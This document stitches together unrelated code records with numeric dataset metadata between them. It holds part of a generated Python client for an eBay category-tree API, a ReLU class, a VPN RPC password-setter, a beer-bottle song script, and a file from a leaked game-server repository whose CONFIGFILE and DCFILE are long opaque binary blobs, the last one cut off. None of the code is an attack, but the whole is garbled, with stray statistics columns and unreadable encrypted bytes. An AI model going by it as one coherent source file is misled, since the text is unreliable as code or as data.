    auth_settings = ['api_auth']  # noqa: E501
    return self.api_client.call_api(
        '/get_default_category_tree_id', 'GET',
        path_params,
        query_params,
        header_params,
        body=None,
        post_params=[],
        files={},
        response_type='BaseCategoryTree',  # noqa: E501
        auth_settings=auth_settings,
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats)
def get_item_aspects_for_category(self, category_id, category_tree_id, **kwargs):  # noqa: E501
    """get_item_aspects_for_category  # noqa: E501

    Return the aspects (item attributes such as color) appropriate for
    describing items in the specified leaf category, with full metadata
    for each aspect (data type, required/optional, variation support,
    allowed values).

    This method is synchronous by default; pass ``async_req=True`` for
    an asynchronous request.
    >>> thread = api.get_item_aspects_for_category(category_id, category_tree_id, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str category_id: The unique identifier of the leaf category for which aspects are being requested. Must identify a leaf node of the tree. (required)
    :param str category_tree_id: The unique identifier of the eBay category tree being queried. (required)
    :return: AspectMetadata
        If the method is called asynchronously,
        returns the request thread.
    """
    # This convenience wrapper always strips the HTTP envelope.
    kwargs['_return_http_data_only'] = True
    if kwargs.get('async_req'):
        # Async: return the request thread untouched.
        return self.get_item_aspects_for_category_with_http_info(category_id, category_tree_id, **kwargs)  # noqa: E501
    # Sync: return only the deserialized response body.
    response = self.get_item_aspects_for_category_with_http_info(category_id, category_tree_id, **kwargs)  # noqa: E501
    return response
def get_item_aspects_for_category_with_http_info(self, category_id, category_tree_id, **kwargs):  # noqa: E501
    """get_item_aspects_for_category (raw HTTP variant).  # noqa: E501

    Same call as ``get_item_aspects_for_category`` but exposes the full
    HTTP plumbing options (``_return_http_data_only``, ``_preload_content``,
    ``_request_timeout``).

    This method is synchronous by default; pass ``async_req=True`` for
    an asynchronous request.
    >>> thread = api.get_item_aspects_for_category_with_http_info(category_id, category_tree_id, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str category_id: The unique identifier of the leaf category for which aspects are being requested. Must identify a leaf node of the tree. (required)
    :param str category_tree_id: The unique identifier of the eBay category tree being queried. (required)
    :return: AspectMetadata
        If the method is called asynchronously,
        returns the request thread.
    """
    # Reject any keyword argument this endpoint does not understand.
    accepted = ('category_id', 'category_tree_id', 'async_req',
                '_return_http_data_only', '_preload_content',
                '_request_timeout')
    for name in kwargs:
        if name not in accepted:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_item_aspects_for_category" % name
            )
    # Merge the positional parameters with the validated kwargs.
    params = dict(kwargs)
    params['category_id'] = category_id
    params['category_tree_id'] = category_tree_id
    # verify the required parameter 'category_id' is set
    if params['category_id'] is None:
        raise ValueError("Missing the required parameter `category_id` when calling `get_item_aspects_for_category`")  # noqa: E501
    # verify the required parameter 'category_tree_id' is set
    if params['category_tree_id'] is None:
        raise ValueError("Missing the required parameter `category_tree_id` when calling `get_item_aspects_for_category`")  # noqa: E501

    collection_formats = {}
    # category_tree_id is interpolated into the URL path; category_id
    # travels as a query parameter.
    path_params = {'category_tree_id': params['category_tree_id']}  # noqa: E501
    query_params = [('category_id', params['category_id'])]  # noqa: E501

    header_params = {}
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['application/json'])  # noqa: E501

    # Authentication setting
    auth_settings = ['api_auth']  # noqa: E501
    return self.api_client.call_api(
        '/category_tree/{category_tree_id}/get_item_aspects_for_category', 'GET',
        path_params,
        query_params,
        header_params,
        body=None,
        post_params=[],
        files={},
        response_type='AspectMetadata',  # noqa: E501
        auth_settings=auth_settings,
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats)
| 70.332941
| 1,106
| 0.709014
| 7,945
| 59,783
| 5.165009
| 0.05752
| 0.059363
| 0.050492
| 0.014036
| 0.963617
| 0.956477
| 0.950848
| 0.945755
| 0.939687
| 0.938128
| 0
| 0.011919
| 0.228125
| 59,783
| 849
| 1,107
| 70.415783
| 0.877365
| 0.588495
| 0
| 0.766885
| 0
| 0
| 0.232311
| 0.075449
| 0
| 0
| 0
| 0
| 0
| 1
| 0.037037
| false
| 0
| 0.008715
| 0
| 0.100218
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
e503a17ace2028d5b1adc68dafbf82a4b9ec2b54
| 166
|
py
|
Python
|
app/pytorch/book/chp004/e1/relu.py
|
yt7589/aqp
|
c9c1c79facdea7ace73e2421e8a5868d87fb58dd
|
[
"Apache-2.0"
] | null | null | null |
app/pytorch/book/chp004/e1/relu.py
|
yt7589/aqp
|
c9c1c79facdea7ace73e2421e8a5868d87fb58dd
|
[
"Apache-2.0"
] | null | null | null |
app/pytorch/book/chp004/e1/relu.py
|
yt7589/aqp
|
c9c1c79facdea7ace73e2421e8a5868d87fb58dd
|
[
"Apache-2.0"
] | null | null | null |
#
import numpy as np
class ReLU():
    """Rectified Linear Unit activation: max(x, 0) element-wise."""

    def __call__(self, x):
        # Keep non-negative entries, zero out negative ones.
        # np.where is used (rather than np.maximum) to preserve the
        # original element-selection semantics exactly.
        keep = x >= 0
        return np.where(keep, x, 0)

    def gradient(self, x):
        # Derivative is 1 where the unit is active (x >= 0), else 0.
        # The subgradient at exactly 0 is taken as 1 here.
        keep = x >= 0
        return np.where(keep, 1, 0)
| 18.444444
| 37
| 0.542169
| 28
| 166
| 3.071429
| 0.535714
| 0.069767
| 0.255814
| 0.302326
| 0.465116
| 0.465116
| 0.465116
| 0
| 0
| 0
| 0
| 0.043103
| 0.301205
| 166
| 9
| 38
| 18.444444
| 0.698276
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0.166667
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
e548c59d4516a08c058bc6f39230da5c2499bbac
| 247
|
py
|
Python
|
SevpnMgmtPy/admin_api/rpc_set_password.py
|
relman/sevpn-mgmt-py
|
e54ef834b2a35bb85f72d72b9ccbc065f2e5a92c
|
[
"MIT"
] | null | null | null |
SevpnMgmtPy/admin_api/rpc_set_password.py
|
relman/sevpn-mgmt-py
|
e54ef834b2a35bb85f72d72b9ccbc065f2e5a92c
|
[
"MIT"
] | null | null | null |
SevpnMgmtPy/admin_api/rpc_set_password.py
|
relman/sevpn-mgmt-py
|
e54ef834b2a35bb85f72d72b9ccbc065f2e5a92c
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
class RpcSetPassword:
    """Carrier for a pre-hashed password destined for an RPC pack.

    The password is expected to arrive already hashed; this class only
    stores it and writes it out under the key the server expects.
    """

    def __init__(self, hashed_password):
        # Store as-is — no hashing is performed here.
        self.hashed_password = hashed_password

    def out_rpc_set_password(self, pack):
        """Serialize the stored hash into *pack* under "HashedPassword"."""
        pack.add_value("HashedPassword", self.hashed_password)
| 30.875
| 63
| 0.688259
| 29
| 247
| 5.448276
| 0.586207
| 0.35443
| 0.341772
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.005076
| 0.202429
| 247
| 7
| 64
| 35.285714
| 0.796954
| 0.08502
| 0
| 0
| 0
| 0
| 0.064516
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.4
| false
| 1
| 0
| 0
| 0.6
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 1
| 0
|
0
| 7
|
e55ee93b759bf471821a57ae05adae6e388f6aa4
| 447
|
py
|
Python
|
99bottles/99bottles.py
|
kevinnls/python
|
ecd483e4666da9afe84662210751f2e3d8d94d16
|
[
"MIT"
] | null | null | null |
99bottles/99bottles.py
|
kevinnls/python
|
ecd483e4666da9afe84662210751f2e3d8d94d16
|
[
"MIT"
] | null | null | null |
99bottles/99bottles.py
|
kevinnls/python
|
ecd483e4666da9afe84662210751f2e3d8d94d16
|
[
"MIT"
] | null | null | null |
# Print the "bottles of beer" counting song, counting down from n.
# Fix over the original: the "take one down" line used the plural
# "bottles" even when the remaining count was exactly 1; the count
# word is now pluralized correctly on every line.
# NOTE(review): the file is named 99bottles but the count starts at 9 —
# confirm whether 99 was intended; the starting value is kept as-is.
n = 9
while n >= 1:
    word = "bottles" if n > 1 else "bottle"
    print(str(n) + " " + word + " of beer on the wall, " + str(n) + " " + word + " of beer.")
    n -= 1
    if n >= 1:
        word = "bottles" if n > 1 else "bottle"
        print("take one down and pass it around, " + str(n) + " " + word + " of beer on the wall.\n\n")
    else:
        # Last verse: no bottles remain.
        print("take one down and pass it around, there are no bottles of beer on the wall.\n\n")
| 37.25
| 98
| 0.545861
| 79
| 447
| 3.088608
| 0.316456
| 0.147541
| 0.266393
| 0.213115
| 0.848361
| 0.819672
| 0.819672
| 0.819672
| 0.606557
| 0.606557
| 0
| 0.016181
| 0.308725
| 447
| 11
| 99
| 40.636364
| 0.773463
| 0
| 0
| 0.181818
| 0
| 0.090909
| 0.534676
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0.272727
| 0
| 0
| 0
| 0.363636
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
e596d5f6e41810bb94d357c9d7b4daee50707088
| 441,050
|
py
|
Python
|
v1.0.0.test/niraidata.py
|
TTOFFLINE-LEAK/ttoffline
|
bb0e91704a755d34983e94288d50288e46b68380
|
[
"MIT"
] | 4
|
2019-07-01T15:46:43.000Z
|
2021-07-23T16:26:48.000Z
|
v1.0.0.test/niraidata.py
|
TTOFFLINE-LEAK/ttoffline
|
bb0e91704a755d34983e94288d50288e46b68380
|
[
"MIT"
] | 1
|
2019-06-29T03:40:05.000Z
|
2021-06-13T01:15:16.000Z
|
v1.0.0.test/niraidata.py
|
TTOFFLINE-LEAK/ttoffline
|
bb0e91704a755d34983e94288d50288e46b68380
|
[
"MIT"
] | 4
|
2019-07-28T21:18:46.000Z
|
2021-02-25T06:37:25.000Z
|
CONFIGFILE = '\xc1A\x1a{\xb4\xaenu7h;\x15\xbe\xdf\xed}\xbd\xfe\xbeM!\x0c\xea\xe0\x06C\xe21\xa9\x8e\x05+\x04\x06\xb4b\x81f\r\xa9\'\xa3\xfa\x10\x87;\x19\xf3\x01K\xf2\x03\xbb\xa8~\xc1\xc7!\xec%\x88\xb9\xdc\xad\x04%di5\x15+\x8d\xf77\x7f\xe2T\xc0\xa0+ZIQ3\xd1`K\xe8\x86\x97]\x90\xe2gt-\xdd)\xcb\xd9$\x1bo\x95\xb0\x00l\xfd\xe6\x8f\x9b\x04\xd5Y\nb\xd7\x1e\x17\xb9\xa4\x99#(\xa1\xf7[\x00\xcb\xd8\x05#\x8b\xf2c[{\xaa\xc4\xd4\x94o\x9a\x82h\x16D\xfeX"*\x96\xf9\xa5%?8Z\x86O\xdbK\xba\x1f/i\xcd\xd3\xaa:\xc1\x14\xd3V\xb9\x90<\x01(=\x18\xe9\xee\t\x06\xebB\xf8P:&\x13\xdb\x92a\xf4\xe9\xd9\x83\x95\x02\x1e \x06:\xbf\xc3\xc8\xcd\xea\x18\xc7\xe8\r=Hv\xe6(\x0f]\xf1JF\xa1a\x95\xdd\'\xd7\xd0\xcdP$\xd0\xc0ep\xa7\xf8\xa8\x16M\x91\xceA\xaa\xe8\x1c\x0f\x93_\x84\xe1\xbd\xa7:\x84*\xee\x9e\x00\x9dQ\\6\x02&\xeaabc\xa9\x98;\xed\xf1\xe4\x9b\xfe\x0ec\xc6\xf5\xd9\xc2\xdd|YP\xbd\x02\xde\xe3Y$\xbb\x0eh\x1eV\x1e\x99_G\x03\x9ej,\x06\xab\x02\x9a\xc0\xf5\xd1\x0es\xe2\x9b\xe4\x13\xdb,\xcf\xbaT\xac4\x95\x86>>\x92>\xd1\x82\xb9V\x93G\x1aJ\xedb\xca\xc25\xf3\xa2G\xa5 ]qB\xf0\xb0prx\xf9\x17\xbe%\xdf\xb6\xc4|{\xd6\xe4Bi)o\xf3#X]Z\xb4\xde\xb2\xa4\xa8\x86f\xa5\xf9\x93\xd6\x06\x02\x03 
\xa8\xec\xbf"\xe0]s\x1a\xc4D\xa8\x1d\xc1\x80\x06I\x13\xd4\x8d\xc6\xe1X\x7f]\x14\xed\xb4h\x7f\xb2$\xbd1G\x17\x0c\x7f\xceq\xc0\xe9\xec\xef\x1d\x0b\xb6\xb0N\xcfT\x1f\x92Wdj\x04\x11\xa5\xeeE#\xbe\x0f\xd3\xd8S\xc7\x17\xf5\x11\xdd\xb5;\xb4`\x02Rn\xc2\xf0P\x86\xca+h\xbd[\xc5H\x9f\x9a\xa1\x96*\xb7\xd1\xa9\xe7\x1b\xc7\xda\x1f\xcd\x90=<\xa8\xee\x81\x88\xb6\xac*Gh\xc3\x84\xf02\xa5g\x87\x0b\x02\x83\x97ru\xc1\xfd\xe8\xf6\x9cb\xa6R\\+&\xc9!\x11N\xb8(S\xa2\xdaqX\x06\xf4\xfe\x006\x8a\x8a\xaa\xe1\xa8x\xac\xf9\x8c]j\xcc\x8bU\xa6<\xe1+d\xf6\x19\xe4\x96\x91\xd3?\xf6\x8e\xb1\xd7!yg\xab\x16\x05\xd9\xa4\xf7\x93Nu\xad=\xe6;\x91\x8eC\x8b\x89$lw\xd4\xf6;\xcf\xa6\x1aL\x1a\x9aE\xf5\xf6\xd0\x8ef\xd9\xda\xbdyQv\xb5ly\xa1]\x19\x1b\xa1\x16\x10\x1315\xfb]\xe9\xea3\'Y\x11\x92\xbb+$\xd2\\\xa1/\xbb\x86W\xfa\xde$\xc7\xe2db8\xcd\xf2}Q+c\x96@`\xba\x92;D\x14\xa8\x85\x855A\x1cL\xd5\xd0\x9fD|\xf4,GA\x96\xee\xa8\xdeT\x80\x889\xea\xd7\x8b\xb2\xef\x8d\xe2\x038EM\xa6\xd4\xa1r#Q\x0c\xc4xR\xd2\xa6\xde\x19\xf3\xc2\x8d\x1d\xf1h\x8fFHOkI\xa3\xbc\xce\xbe.\x921\xf9\xf2=o\xb2\xe7\x88\x1a\xec \xbcg\xcb\xc6\xf2\xa8z\x16{(8\xd1~yU:\xc2\x01\xa0Z\xde\xbc\x13c\x83\x0c\xb1\xd3\x8b\xb1\xfa#is&^S\x9e}\xc2\x1c\x1d\xb9\xef\x03\x90b\xc4\x17.#\xa1\xe4\xd1\xd1\xe6\xc8\t\xee\x93\xc9~\xf67\x14\xaa\x8e\x19\x9c\x1e\xac\xbdbEO\x97A\x9d8N\x92F\xb6emDo~\xad.\xe6\xf4\xcf\xecl\xac2\x1c\xd4\xab,u\t\xc4\xe6\x96u\xc4\x0f7\xc5\xe4\x92\x01\x06\x8c93 
$\x9a\x85\x15\x9d<\x03\x14:\x1c\xaf\x82B\xe8I\x0b\x93\x96\xc0?\x13T\x9a\xec\xbe\xcc_KS\x9fA@\xa9l\x82nc\xc9!.T\x13\x04a\xca\\\x0c\x8a\x91N\xcc\xb4\xf4\xbe\x85ZoY\x84\x9b\x135\x89\xfc\xdf\x91\xf1\xb3g\x8d\xcf\xe6\xf2\xf9[\xf2\xd0\xde\x13\xc3T\xee/\xb4~\xe0\xb2G\x9du\xbf\xb8%sf\xd6\xfeG\xe24\x84\x88\xbd\xb2I\x18Dy\x02\xa6\xef\xac\x1ao+\xc3\xc309r\xf2\xbd\xfe<\r\xd2\xf2~\xfd\xb8-\x9f1\x8e\xe9\x10\xe6S\xb1\x15\xf3\xbfR\xd5\xe1\xcc\x9d\xb6\x90\xc4b)qj\xe7B\x97\xdc\xa3\xb4\xf7}\xdejT\x10\xcd\x119\x96\xb0\xd8\x1cQ\x85\x1e\xbc\xb8d\x12$U\x1e\xd0(>\xee>\\\x05\xf4!\xc4\x99\x05{\xef\xfd\x81\xa1\x83\xaa\xda\x0b4?Z\xbf&\x9bZ\x8e\x98\xbc\xe9\x89\xda\xb2\x97*{j\xf0\xda\xb89j\x12\x8c\xdaa\x03\x89F%\x8a7\xf7n\xd5\xdc#XN\xa9\x9f(\x04\\\xc4\x9c\xa4\xdf\xcd\x1ffH\xc9\r\x0c*\xa6\x8d\xb8\xfc@_6\xeb4c\xfc\xa3]K\x19\\\x04\xe8H\xac\xd2)\xd0@y\xb7\r0k\xb8\xbc\x96P^\xc7\x9f\xb9q\xf3\xbf:]\x01D\xfb|\xf4zrc\xa9|<#|\xcc\xf1\x81Hr\xe3\x97\x11\xf8\xac,\xdbVw\xe50\xf3\x05\nu\x17ln\xa7\xef\x07\xb9-\r\xef<\x87\x907\x88\xdchTV\x9e\xee\r%\xee^V\xb0F\tB3OIf\x8f\xafx\x9f\xfbB\xbd\x98\xc0\xd4\x98\x8c\xa7\x8aiz\x07\x86\xe5\xa1O2^!TW\x8a\xd8\xef\xad\x99\x99Y/\xb2\xa9\xba\xda\xba\xff\x99\xdb\x0e\xe5\xa5\xb4*\xaeI\x13\xfb\xa7z\xa3Kr\xe5\xe6\\\x89+(\x1bX\xbcK 
IW\xec\xaa\x1e\xd5\xb4$\x1e2J9\xba\xdc\xcc\x0c\xd8`r\xd1+\xff\x83\xdcY\x0e\xf6u@\xae}\x8d\\!\x13s\t\x88\xb3\x8d\xd9ZAF\x90\x12(\xf5l\x97\xfa\x8b=\x18\x7f\xf5\xe8\x1d3\xbc\x18"\xd3\xc9!C\xb4\xb6\x93V`\x92\n\xbe\xff\x979f\xcc\xa5\xa9\xa9H-!\x1a\xcds\xa6\xc8\x8a@\x07\xf4}\xe4\x8b\x99}\x95Y6\xb0\xe1W:\xc8\x87\xde\x18_X\x89\x84\x9f\xef\xab\xdb\x8e:\xf9\xeeI?p\tQ\xcd\xb4\x02\x1f\xcc\xdb\x1a\x82\xbf\x90\xf4\x01\xa7\x93Ck<\xf0S\xc8d\x9f\xa5ckf[\'/T\xee\xa1\xc1O\x15\x8b\x91\xca\x03\x89=c6\x97Z\xce<;u\n\xd9\x0b^\xf4\xb8tw\x08r\x88\x99\x8e\xf1\x87eM\xd3b\xdb\'\xe2\xcd\xf6|\x1c\xb3C\xad\x85\x05\x9dB*\x8d\xa3\x16\xd2\r\xd1\xaf\x9b\xe0;:m~\x02Zk\n\xca\xb4\'\xd1\xe9L\xd2\xe9>{\x81\xe7\x1d\xe8\x83\x96\x1e\x81\xa3cD\x9cb\x92@\xafm\xb1b\xe1\xe3P\x92$\x0f\x9a\xa7V\xb7\xc9\x86\xc81\xb0\x06\x83\xed/Ir?\x86\x8d[\xe5\xb7\x9a\xea\xfe\xd5\x80\x84\xb2-\xe3U\xff\xc5\xcf\x1b\xe0\xaa\x1b\x0e\x95\xbd\xd5D\x88\xa0"\xd9\xb8\x84\xe9:O\xb5x\x9eq4\xd0\xf4J\xe2MY\n\xffm\xfa\xd4-\xfc(\x97\x92\\\xecG\x92\x9e\xd3N\x801\xf5\xacP\x1d\xfc\x112Y\xe1\xa8\xdd\xfc\xc0y\xdbX\xfa;A]`c\xd7\x82\x11\xe4\xa7\x08\xb7f("&\x17j\x8c_a\x03:\xac\xed$\r\xb8h\xb8\tM\x80\x87\xfbq\xbf\x86\xf1\x98,?a=\xb9`\xd3pS:oZ_\x0b\xc8\x15\xbb\xe2\xa6\xa0G\xfa\x90\x1f\xe2\xc9\x9d\xc2\xf8\x9a\xcc\xf8S\xbd\x1bP\tL~\xe2\xdf\x85\x01\xc71\x16w\x1e\xfc\x90\xfcW\xb1q\xab\x0e\xf3\x97gU\xcb'
DCFILE = '\xa9Qy(c\xed^\x82\xcb\x82\xd1\x9d\xab\xb8\xd1s-\xc5\xcd\x8cSO\x14:\x87\xb1\xbc\x89\xb8\xe8\xaaP\x9b*\xfb\x1e\xec\x82\x10*\xa1i!\x82\x1c\x0b\xaa\x03 Cc\xfc\xbdw\x9a\xcaR!\x92\xc2\x9f\x94\xa4\xc01\x82\xf5\xde\x88x\xfc\xd5M\xefn\x9f\x9d\xbeM\xc3\xee\xf3L\xd2\x99\x1e\x1b|\xad\xe5\x9e:5w{H=\x13\xf8\x1b/Bu\xc8\x06\xf2\x9f\x9a\xc0\xc5\x81>O\x91W\x8d\x0c\xe17b4\x9f\\\xa5\xb6\x19\xe1\xb9\xb9\xc6\r<\x84\xd2>\nH\x87\x92\xc6<99\xf9\x10\xd6E\x9c\x10\xc2\xbb\xc30\xd8\x81\xc3\xd8:\x15e\xf1B:\xd40\xc2jB\xc2]R\xfc^\xcc\xd5\x9be-\xc1\xe9b\x01\x8c\x99\xab\xceN\xf5\xab[wp{\x01\x99\xa2\xd1\xb1\xa7Y\x9c\xe0\x7f\xb4\xbfb\xc0\'j?\xe7\xf6\x86\x16?3v\xadf\x95\x9ai\xd8\xd9lyB\xe6tg\x99p\xa6\x919\x98\xa0m`&.\x9b\x8a\x98\x85\'t8\xf9\x98\xa3\x0f\xd3x#\xe5L\x9e\xfaed\x98d8\xb3h\xca\xc3\xb5\xfae"N\x84\xdc\x99\x01R\x1f\xce\xaf\x8dDyT\xbf\x13\x13c\xd9z\xff\xf1S\xfa\x9dI\x05\xbf%#b\xc3K\xa8\xda\xe5\x96f\xc8\x04\x91o\x17\xa0Y\x17X\r\r>\x10\xe3]\xba8\x19\xb6\x12\xb6\n\x03\xb8\xa2\xa7\xe3\x08\x98xHil\x9f\xa4[\xc6\xb2dI\xb1\xa9\x12kh\x15\x0eUK\xa4\xb5vF$K\x07\x9e{/k\xf0\xb4\x9b\xde/\xd5\\\xd2yo\x12\xefn[_\xdcPZ\x9e\x8c\xed0 
\xc2k\xc0\x9e\xae\x8e\xd9w\x0f\xd4\x96m\xf7\x97&?\xf7m\\\x9f\xcf1/5V\xf1\xef}\x95\x9a)\x12\xa0\x9ck\x8b0\x1c\x03\x1b\xe1\xcdI8\x99\xbdk\xaa2\xfa\x1e\xb9\xbe6F\t\x16`\xce\xdelA\xd9\'\xb1\xa8\x12\xbf\xf7fsr\\\x9c\xef\xed\xd6\n\xacm\xc6\n(\xbf\x02\xec4V\x00\x03\xa3>\xa6\x04\xff\xd7\t^\xcac|\xc7\x80\xa3oT\x0eA\xc8\xf1z1`\xc7Z\x87\xdc(F0\x95\xbe\xeb\xc3\x99\x8f\xf7.\xf2\xbd\xdb\xed\xb6\xcdV\xab\x17\x05h\xc6\x07\x11\xa9x\x1b>kn0\x03\xdf\xda\xd0`j\xb7\xf4^\xb0\xfd\xbcd0gp\xe55\xabK4\x89\xda5\xf3\xf0\xdfb\xde\x90z\x06(\x0c\xf0Oo\x9c\xbcx\xa5\x96\x0b{\x90s\x12\xdd;\x06E\x11(Av%\xc8\xcb\xd3\xfd\x8a!\xbdQ;x\xdd\x93c\x1d]\x19\x9a\x88\xff\x9c\x02uL\xdc\xaf\xbe\xe1\x9e\x85\x83~z\x00?\xe4\x9cK\\\xab=\x06u\x12x\x94\xa7\x8a\n\x87\x06\x08\x8b\x84B\xfb_\xd7tO\xd1\x97g\x9a\x00\x0f05|\xc1\xab\x0c\xa0v.\xbb\x0c\xd2\xc75Fs\xedu\xc4\xb4\xd8:N\xb3\xfbo)\xf7\xfd.\x8a\x94A"B\xac\x1c;\x8c?2\xfd$\xf6\x88d\x04\xdd\xb71"\xf4\xed\n\xa1e1\xc9\x89s\'M\x82\xa0\xd0\xa2\x08\xe3A`/\xcff\xfex\x10V\xff\x98\xb0>\x01\x91N\xc9\x12?et\xd3\xe17\xf8\xe8\x17c\xd3 \xe7\xbc\x96\xe0\xec\x8e\xe7W\xfb\x8c\xc0K\x17\x981f\'s\xb3\xcb$g\'\xa4D4&\xa7\xa8;\x10\x07\xd8\x11\x93 \x87V\x99\xd8zm\xe7!\xd6\xc1h\x1f\x8d\xae\xb7\x14$`N\x10\x94z\xa0\n\xf7\x06\x92\x00\xf3Dw6>>\xb2\xf7\xff\xbc\xb2\x99\x94\x89\x7f\x85\xb7\x885\x8fe\x85\x1e\x80\x99\xe2mT;eA\xa9\xc3\xea\xa3\x18\xf7|^M\x1a\xddo\xca\r\xc8\x97\x1c\x91q\x7f\x8ey7\x85\xab1xB\t\'\xe5D\xb8 \xe2*\xca-+\xbb\x19\x0e\x9d9+]\x01i\x10VH3\xb7\xe3/\xede\x8f?\x9c\x10\x96?\xce\xeb\xec?\xa3\x94\ri\xc9\xc2\xa4\x8b\x00F\xc8\x97C\x836\xcf\xf1b/\x1b\x8dj\x84\x9d\xb8q\x93\xc8\xe8~5\n\xe9\xc1\x9f\xcejxx@\xd6|u\x8e,\xaeHf~z\xce\x19\xc9\xba\xd2\xb4\xe1\xd4NA\xfc\x06\xf1\xe5\x80\xf1\x15|\xd4\x8e\xff\x04\xeb\xe2c\xb7#\xa9\xdb\xbcI 
\xe4\x9e\x94\xbb\xc15\xeen\xc9\x0b\x1c\xe1\x17\x0f\xe9\x1b0\xf4\tA\x89\x84d\xd5\x8e\xed\x1a\xc3\xa4~\xd9\x1b\xeb\xfc+\x11\x8b\xe9j\xcc\xc8\x82\xac)\x8a\xfc\x18\x9c;\xcd\x13E\x1c,\x1b\xb2\xca\xcf\x0b\nq\xc9\xb5\xe7\\\x06\xec\x84\xdf\xfe\xc5t\xa5+\x04\xe9\xf3\xdc2{\x89\xa7\xd4\x16F\x8d\xb9\x95\xef\xd4Dw%\x07\xbf\x99O\xa9\x1b\xb1?\xee\x7f69\x957\x00B\x9c\xb0aGK\xeaxO[\x00F\x91\x066\xa4\xa0\xd1\xd5\xad\xd5\'\xd1\x0b\x83\xf3\x83\xf9H\x89H|\x0f\xc8^B\x07\x9f\x02\xf7\x19\x9ef7\x16\xfd\xd0b\x9a\x88\xc7\xf2\x16\xbaL8=\x15\x01\xfcqmf\x15\x1dq\xab\x7f\x84\x88\xd6V\xc2C\x04R\xb0O\\\xe2C\x91\xc99."\xe3\xa6\xab\x03.\x8bDd;\xa09\xa3\xc3\x96\\_.\x1b(\x16\xdaN\x85\xf1\xfb\x92P_\xecT\xaa&t\xbavT\xda(/%\xb1\x7f\xbd\xaf)\x16`,u\x03\xef1?Rzr\x14\xf2\xa7\xb5\xfc\xff\xfd\x13\x0b?1\x87z4\xd5\x01\xe5\xbf\xb5\xaasX\xa5d\xfb\xfdGc\x1f\xa1\x1b8\xdc8A\xafR\xcdA\xddgl\xc8\x90f\x8b\x1cE\xeea\x84\x08A\x113\xba\xf5O\x96\x9f\xe5kT\x1e\xb3\xd8\xc0\xdat\x92F\xc2"\x183\xc4.{\x12\x8b?0\x9b\xcb\x83\xbe\xebf\xd9^j\xb4\xa7r\x0cq9{\xf2\x9b\xd0-jt\xa2\xd4\xf0"\xa7ObDj\x95\xfbG\xbd\xe9\xf0Y\xa06)g\xc2\xf5\xb8\\J\x08C\xb7r\xbf1\xcf{\x9dV\x93\xf3\x0b\xe4\xee\x97-n\x87\xbb\xe4\xeb\t\xdd\x9b\xbea\xb9\xa5\x1e\xa3\xd0|%cr\xf0/\xd7c\xaceY|\x87\xd8\x0c@\xa2\xe2pi\x11\xe34\xce\xe9\xadh$0\xcd\x9a\x0c\x96p\x81\xe6g}\xf4\xc9\x93"Z\x9b\x08\x87)wH\x19\xd8\xf2rF\xe6\x97\x88ms5~\x80\x7f\xb4\xff^_\xa8\xbaX\xe4\xeaEn3\x94\xfe\\s\x0f\xf5\x1d\x0e\xff\x9e\xd4`}}\xa1\xe9O\xd66\xfa\xf2\xf0\x97\x06\xa0\xda\x86\xa3\xc4@L\x8e\'N\xfe\xc9J\xfeu-\xd0\xe6\xeda8\x81G_\x08\xf6\x99oz\x94\x8a\x1eK\xc7\\0\x02EQ\x8f\xe9\xdfQ\xfet&\xc4\x98k\xa4,\x86\xd4\x869A/\xb4\x82\xb3\xca\xf9\x9a\x06V\xba\xfd\xb48m\xb2\xe5\xbb\xd4\xdc\xeb\xd8\xbf\xc1\x9f\xbeE\xb60\x01\xa7\x0b\x87\xc7\x14h\xba\x16\x8aP2P\\#\xf9|\x15\xe92K\x92i\xc2\xe9Le\x05ws`j|\x07)\x143\xfc\xfd\x8d\x89XT{E\x0b:@4\xdbN\xac\xab\xeb\xc7pG\x01Z\xd4Gx0\xa2\x0fnM\xa4X\xc6h\x83U\x00{\x83\xa9\x8f\xde\\K2M\x1f\xe9O\x01\x11\xbe\xf8\x88\xec\x0f\x9b\xc6\xf0y\xd0N\x04\xf3\xc8d\xd2\x1a\x9f\x91J\x98\xfe\x
